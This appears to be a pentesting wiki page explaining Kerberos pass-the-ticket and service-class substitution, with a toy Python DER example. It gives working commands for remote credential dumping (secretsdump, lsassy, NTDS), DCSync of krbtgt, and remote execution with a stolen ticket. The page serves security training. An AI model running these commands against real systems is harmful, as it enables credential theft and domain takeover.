Pass the ticket
MITRE ATT&CK™ Sub-technique T1550.003
There are ways to come across Kerberos tickets (e.g. cached tickets found on a compromised host) or to forge them (overpass-the-hash, silver ticket and golden ticket attacks). Such a ticket can then be used to authenticate to a system with Kerberos without knowing any password. This is called Pass the ticket. Another name for this is Pass the Cache, used when the tickets come from, or are found on, UNIX-like systems (i.e. in credential cache form).
Tip: convert tickets between the UNIX (`.ccache`) and Windows (`.kirbi`) formats with Impacket's ticketConverter.py

```bash
# Windows -> UNIX
ticketConverter.py $ticket.kirbi $ticket.ccache
# UNIX -> Windows
ticketConverter.py $ticket.ccache $ticket.kirbi
```
Once a ticket is obtained or created, it must be made available to the tools that will use it.

On UNIX-like systems, the ticket file is referenced in the `KRB5CCNAME` environment variable, which the other tools read.

```bash
# use a .kirbi file
export KRB5CCNAME=$ticket.kirbi
# use a .ccache file
export KRB5CCNAME=$ticket.ccache
```

On Windows, the ticket is injected into the current logon session with Rubeus (the `/ticket` argument accepts either a base64 blob or the path to a `.kirbi` file).

```powershell
Rubeus.exe ptt /ticket:"base64 | file.kirbi"
```
It is then possible to list the tickets in memory using the `klist` command.

- On Windows, once Kerberos tickets are injected, they can be used natively by any tool that relies on the current logon session.
- On UNIX-like systems, once the `KRB5CCNAME` variable is exported, the ticket can be used by tools that support Kerberos authentication (Impacket scripts and CrackMapExec with the `-k` flag, for instance).

A few things to check when a passed ticket gets refused: the target must be referenced by the hostname matching the ticket's SPN (not by IP address), the clock of the attacking machine must be within the domain's clock skew tolerance (5 minutes by default), and the ticket must not have expired.
The following commands all rely on Kerberos authentication (the `-k` flag for the UNIX-like tools).

Dump secrets remotely (secretsdump, CrackMapExec, lsassy):

```bash
secretsdump.py -k $TARGET
crackmapexec smb $TARGETS -k --sam
crackmapexec smb $TARGETS -k --lsa
crackmapexec smb $TARGETS -k --ntds
crackmapexec smb $TARGETS -k -M lsassy
crackmapexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
lsassy -k $TARGETS
```

Execute commands remotely (Impacket, CrackMapExec):

```bash
psexec.py -k 'DOMAIN/USER@TARGET'
smbexec.py -k 'DOMAIN/USER@TARGET'
wmiexec.py -k 'DOMAIN/USER@TARGET'
atexec.py -k 'DOMAIN/USER@TARGET'
dcomexec.py -k 'DOMAIN/USER@TARGET'
crackmapexec winrm $TARGETS -k -x whoami
crackmapexec smb $TARGETS -k -x whoami
```

From Windows, once the ticket is injected (mimikatz DCSync, PsExec):

```
lsadump::dcsync /dc:$DomainController /domain:$DOMAIN /user:krbtgt
```

```powershell
.\PsExec.exe -accepteula \\$TARGET cmd
```
When requesting access to a service, a Service Ticket (ST) is used. It contains enough information about the user for the destination service to decide whether to grant access, without asking the Domain Controller. This information is stored in a protected blob inside the ST called the PAC (Privilege Attribute Certificate). In theory, the user requesting access can't tamper with the PAC: it is signed, and it sits in the part of the ticket that is encrypted with the service account's key.

Another piece of information stored in the ST, outside of the PAC and unprotected, called `sname`, indicates what service the ticket is destined to be used for. It is basically the SPN (Service Principal Name) of the target service, split into two elements: the service class and the hostname.

There are multiple service classes for the different service types (LDAP, CIFS, HTTP and so on; more info on adsecurity.org). The problem is that `sname` is not part of the encrypted ticket body, so whoever holds the ticket can rewrite it. Since a ticket is encrypted with the long-term key of the account running the service, not with anything specific to the SPN, any service whose SPN is registered on the same account (all the SPNs of a machine account, for instance) will decrypt and accept it. There are therefore scenarios (e.g. a ticket obtained through constrained delegation for one specific SPN such as `cifs/target`) where changing the service class in the ticket gives the attacker access to other types of services on the same host. Changing the hostname to a machine whose SPNs belong to a different account does not work, since that service cannot decrypt the ticket.
The substitution can be done with Impacket's tgssub.py on UNIX-like systems, or with Rubeus on Windows.

```bash
tgssub.py -in ticket.ccache -out newticket.ccache -altservice "cifs/target"
```

```powershell
Rubeus.exe tgssub /altservice:cifs /ticket:"base64 | ticket.kirbi"
```
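To make concrete why the service-class substitution described above is possible, here is an added Python example (not code from the original page, and unrelated to the implementations of tgssub.py or Rubeus). It encodes a toy Kerberos Ticket in DER following the RFC 4120 structure, rewrites the service class inside `sname` and shows that the enc-part bytes are untouched. The realm `LAB.LOCAL`, the host `dc01.lab.local` and the cipher bytes are constructed placeholders, and the enc-part is filler rather than real encrypted data, which is why no service key is involved.

```python
# Added example (not from the original page, and not tgssub.py or Rubeus code):
# a minimal DER model of a Kerberos Ticket (RFC 4120 section 5.3) showing that
# sname sits in the cleartext part and can be rewritten without touching
# enc-part. Realm, host and cipher bytes are constructed placeholders; the
# enc-part is filler, not real EncryptedData produced with a service key.

SEQUENCE, INTEGER, OCTET_STRING, GENERAL_STRING = 0x30, 0x02, 0x04, 0x1B
APPLICATION_1 = 0x61                       # [APPLICATION 1] constructed: Ticket


def ctx(n):
    """Context-specific constructed tag [n]."""
    return 0xA0 | n


def der_len(n):
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, body):
    return bytes([tag]) + der_len(len(body)) + body


def der_int(v):
    """Non-negative INTEGER (enough for tkt-vno, etype, name-type)."""
    return tlv(INTEGER, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big"))


def name_string(parts):
    """name-string [1] SEQUENCE OF GeneralString"""
    return tlv(ctx(1), tlv(SEQUENCE, b"".join(tlv(GENERAL_STRING, p.encode()) for p in parts)))


def build_ticket(realm, service_class, host, etype, cipher):
    """Ticket ::= [APPLICATION 1] SEQUENCE { tkt-vno [0], realm [1],
    sname [2] PrincipalName (name-type NT-SRV-INST = 2), enc-part [3] }"""
    sname = tlv(SEQUENCE, tlv(ctx(0), der_int(2)) + name_string([service_class, host]))
    enc_part = tlv(SEQUENCE, tlv(ctx(0), der_int(etype)) + tlv(ctx(2), tlv(OCTET_STRING, cipher)))
    body = (tlv(ctx(0), der_int(5)) + tlv(ctx(1), tlv(GENERAL_STRING, realm.encode())) +
            tlv(ctx(2), sname) + tlv(ctx(3), enc_part))
    return tlv(APPLICATION_1, tlv(SEQUENCE, body))


def parse_tlv(data, off=0):
    """Return (tag, body, next_offset) for the DER TLV at data[off:]."""
    tag, first = data[off], data[off + 1]
    if first < 0x80:
        length, hdr = first, 2
    else:
        n = first & 0x7F
        length, hdr = int.from_bytes(data[off + 2:off + 2 + n], "big"), 2 + n
    start = off + hdr
    return tag, data[start:start + length], start + length


def children(body):
    """Split a constructed body into its (tag, body) members, in order."""
    out, off = [], 0
    while off < len(body):
        tag, inner, off = parse_tlv(body, off)
        out.append((tag, inner))
    return out


def ticket_fields(ticket):
    tag, app_body, end = parse_tlv(ticket)
    if tag != APPLICATION_1 or end != len(ticket):
        raise ValueError("not a DER Ticket")
    seq_tag, seq_body, _ = parse_tlv(app_body)
    if seq_tag != SEQUENCE:
        raise ValueError("malformed Ticket")
    return children(seq_body)             # [(ctx(0), ...), ..., (ctx(3), ...)]


def field(ticket, n):
    """Body of the [n]-tagged member of the Ticket SEQUENCE ([3] is enc-part)."""
    for tag, body in ticket_fields(ticket):
        if tag == ctx(n):
            return body
    raise ValueError("field [%d] missing" % n)


def sname_parts(ticket):
    """name-string of sname, e.g. ['ldap', 'dc01.lab.local']."""
    _, pn_body, _ = parse_tlv(field(ticket, 2))        # PrincipalName SEQUENCE
    strings = next(b for t, b in children(pn_body) if t == ctx(1))
    _, seq, _ = parse_tlv(strings)
    return [s.decode() for _, s in children(seq)]


def substitute_service_class(ticket, new_class):
    """Rewrite only the service class of sname (what tgssub does); every other
    field, enc-part included, is re-emitted byte for byte."""
    parts = sname_parts(ticket)
    parts[0] = new_class
    out = b""
    for tag, body in ticket_fields(ticket):
        if tag == ctx(2):
            _, pn_body, _ = parse_tlv(body)
            name_type = next(b for t, b in children(pn_body) if t == ctx(0))
            out += tlv(tag, tlv(SEQUENCE, tlv(ctx(0), name_type) + name_string(parts)))
        else:
            out += tlv(tag, body)
    return tlv(APPLICATION_1, tlv(SEQUENCE, out))


if __name__ == "__main__":
    original = build_ticket("LAB.LOCAL", "ldap", "dc01.lab.local", 18, bytes(range(200)))
    forged = substitute_service_class(original, "cifs")
    print("/".join(sname_parts(original)), "->", "/".join(sname_parts(forged)))
    print("enc-part untouched:", field(forged, 3) == field(original, 3))
```

The point of the `field(ticket, 3)` comparison is that this is the only part of the ticket the receiving service actually decrypts and checks; since the rewritten `sname` never enters that computation, the service running under the same account accepts the ticket for a different service class. A real ticket also carries the PAC inside that encrypted part, which is why the substitution changes the target service but not the identity or privileges it conveys.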